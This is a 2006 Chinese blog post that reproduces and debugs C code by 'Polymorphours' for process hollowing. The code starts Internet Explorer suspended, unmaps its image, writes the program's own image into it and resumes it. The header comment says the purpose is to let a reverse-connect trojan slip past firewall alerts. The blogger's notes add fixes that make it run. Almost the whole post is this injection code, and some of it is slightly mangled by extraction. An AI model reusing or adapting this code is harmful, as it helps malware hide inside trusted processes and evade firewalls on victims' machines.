学习Polymorphours的绕过防火墙的反向连接报警代码

于 2006-09-21 20:08:00 发布
阅读量1.5k 收藏 1
点赞数
CC 4.0 BY-SA版权
文章标签: 防火墙 null path header 虚拟机 dos
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/annhf/article/details/1262044

/*

Author: Polymorphours

Date: 2005/1/10

另一种将自己代码注入傀儡进程的方法,配合反弹木马,可绕过防火墙的
         反向连接报警。

*/

#include
#include

//
// ntdll.lib ( 来自DDK 2000 )
//

#pragma comment(lib,"ntdll.lib")

typedef long NTSTATUS;

NTSYSAPI
NTSTATUS
NTAPI
ZwUnmapViewOfSection(
HANDLE ProcessHandle,
PVOID BaseAddress
);

typedef struct _ChildProcessInfo {

DWORD dwBaseAddress;
DWORD dwReserve;
} CHILDPROCESS, *PCHILDPROCESS;

BOOL
FindIePath(
char *IePath,
int *dwBuffSize
);


BOOL InjectProcess(void);


DWORD
GetSelfImageSize(
HMODULE hModule
);

BOOL
CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
);


char szIePath[MAX_PATH];

int main(void)
{
if (InjectProcess() ) {

printf("This is my a test code,made by (Polymorphours)shadow3./r/n");
} else {

MessageBox(NULL,"进程插入完成","Text",MB_OK);
}

return 0;
}

BOOL
FindIePath(
char *IePath,
int *dwBuffSize
)
{
char szSystemDir[MAX_PATH];

GetSystemDirectory(szSystemDir,MAX_PATH);

szSystemDir[2] = '/0'
lstrcat(szSystemDir,"//Program Files//Internet Explorer//iexplore.exe");

lstrcpy(IePath, szSystemDir);
return TRUE;
}


BOOL InjectProcess(void)
{
char szModulePath[MAX_PATH];
DWORD dwImageSize = 0;

STARTUPINFO si = {0};
PROCESS_INFORMATION pi;
CONTEXT ThreadCxt;
DWORD *PPEB;
DWORD dwWrite = 0;
CHILDPROCESS stChildProcess;
LPVOID lpVirtual = NULL;
PIMAGE_DOS_HEADER pDosheader = NULL;
PIMAGE_NT_HEADERS pVirPeHead = NULL;

HMODULE hModule = NULL;

ZeroMemory( szModulePath, MAX_PATH );
ZeroMemory( szIePath, MAX_PATH );

GetModuleFileName( NULL, szModulePath, MAX_PATH );
FindIePath( szIePath, NULL );

if ( lstrcmpiA( szIePath, szModulePath ) == 0 ) {

return FALSE;
}

hModule = GetModuleHandle( NULL );
if ( hModule == NULL ) {

return FALSE;
}

pDosheader = (PIMAGE_DOS_HEADER)hModule;
pVirPeHead = (PIMAGE_NT_HEADERS)((DWORD)hModule + pDosheader->e_lfanew);

dwImageSize = GetSelfImageSize(hModule);

//
// 以挂起模式启动一个傀儡进程,这里为了传透防火墙,使用IE进程
//

if ( CreateInjectProcess(
&pi,
&ThreadCxt ,
&stChildProcess
) ) {

printf("CHILD PID: [%d]/r/n",pi.dwProcessId);

//
// 卸载需要注入进程中的代码
//

if ( ZwUnmapViewOfSection(
pi.hProcess,
(LPVOID)stChildProcess.dwBaseAddress
) == 0 ) {

//
// 重新分配内存
//

lpVirtual = VirtualAllocEx(
pi.hProcess,
(LPVOID)hModule,
dwImageSize,
MEM_RESERVE │ MEM_COMMIT, PAGE_EXECUTE_READWRITE
);

if ( lpVirtual ) {

printf("Unmapped and Allocated Mem Success./r/n");
}

} else {

printf("ZwUnmapViewOfSection() failed./r/n");
return TRUE;
}

if ( lpVirtual ) {

PPEB = (DWORD *)ThreadCxt.Ebx;

//
// 重写装载地址
//

WriteProcessMemory(
pi.hProcess,
&PPEB[2],
&lpVirtual,
sizeof(DWORD),
&dwWrite
);

//
// 写入自己进程的代码到目标进程
//

if ( WriteProcessMemory(
pi.hProcess,
lpVirtual,
hModule,
dwImageSize,
&dwWrite) ) {

printf("image inject into process success./r/n");

ThreadCxt.ContextFlags = CONTEXT_FULL;
if ( (DWORD)lpVirtual == stChildProcess.dwBaseAddress ) {

ThreadCxt.Eax = (DWORD)pVirPeHead->OptionalHeader.ImageBase + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
} else {

ThreadCxt.Eax = (DWORD)lpVirtual + pVirPeHead->OptionalHeader.AddressOfEntryPoint;
}

#ifdef DEBUG
printf("EAX = [0x%08x]/r/n",ThreadCxt.Eax);
printf("EBX = [0x%08x]/r/n",ThreadCxt.Ebx);
printf("ECX = [0x%08x]/r/n",ThreadCxt.Ecx);
printf("EDX = [0x%08x]/r/n",ThreadCxt.Edx);
printf("EIP = [0x%08x]/r/n",ThreadCxt.Eip);
#endif

SetThreadContext(pi.hThread, &ThreadCxt);
ResumeThread(pi.hThread);

} else {

printf("WirteMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}

} else {

printf("VirtualMemory Failed,code:%d/r/n",GetLastError());
TerminateProcess(pi.hProcess, 0);
}
}

return TRUE;
}

DWORD
GetSelfImageSize(
HMODULE hModule
)
{
DWORD dwImageSize;

_asm
{
mov ecx,0x30
mov eax, fs:[ecx]
mov eax, [eax + 0x0c]
mov esi, [eax + 0x0c]
add esi,0x20
lodsd
mov dwImageSize,eax

}

return dwImageSize;
}

BOOL
CreateInjectProcess(
PPROCESS_INFORMATION pi,
PCONTEXT pThreadCxt,
CHILDPROCESS *pChildProcess
)

{
STARTUPINFO si = {0};

DWORD *PPEB;
DWORD read;

// 使用挂起模式启动ie

if( CreateProcess(
NULL,
szIePath,
NULL,
NULL,
0,
CREATE_SUSPENDED,
NULL,
NULL,
&si,
pi
) ) {

pThreadCxt->ContextFlags = CONTEXT_FULL;
GetThreadContext(pi->hThread, pThreadCxt);

PPEB = (DWORD *)pThreadCxt->Ebx;

// 得到ie的装载基地址
ReadProcessMemory(
pi->hProcess,
&PPEB[2],
(LPVOID)&(pChildProcess->dwBaseAddress),
sizeof(DWORD),
&read
);

return TRUE ;

}

return FALSE;


 

 

首先ZwUnmapViewOfSection这个函数不能使用,不知道怎么回事。换了一个方面使用,把代码写在这里。
首先申明:
typedef long NTSTATUS;
typedef NTSTATUS (__stdcall *ZWUNMAPVIEWOFSECTION) (IN HANDLE ProcessHandle, IN PVOID BaseAddress );

static ZWUNMAPVIEWOFSECTION     ZwUnmapViewOfSection     = NULL;

在函数中使用:
if (!(hModule = LoadLibrary("ntdll.dll")))
 {
  return FALSE;
 }

 if (!(ZwUnmapViewOfSection = (ZWUNMAPVIEWOFSECTION)GetProcAddress(hModule, "ZwUnmapViewOfSection")))
 {
  return FALSE;
 }

函数调用的问题解决了,但是函数ResumeThread(pi.hThread); 运行报错。这个错误是我在虚拟机运行时报的错。但是我在xp,自己系统下,没有报错。但是直接运行程序报错,应用程序正常初始化(0x0000142)失败。把这个程序放到2000的虚拟机上运行正常。可以判断这段代码不支持xp。这个判断是错误的,我已经把这个问题解决了。我在主程序中加入了如下代码:

while(1)
{}

问题就解决了。进一步的工作是了解原因。

annhf
关注
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值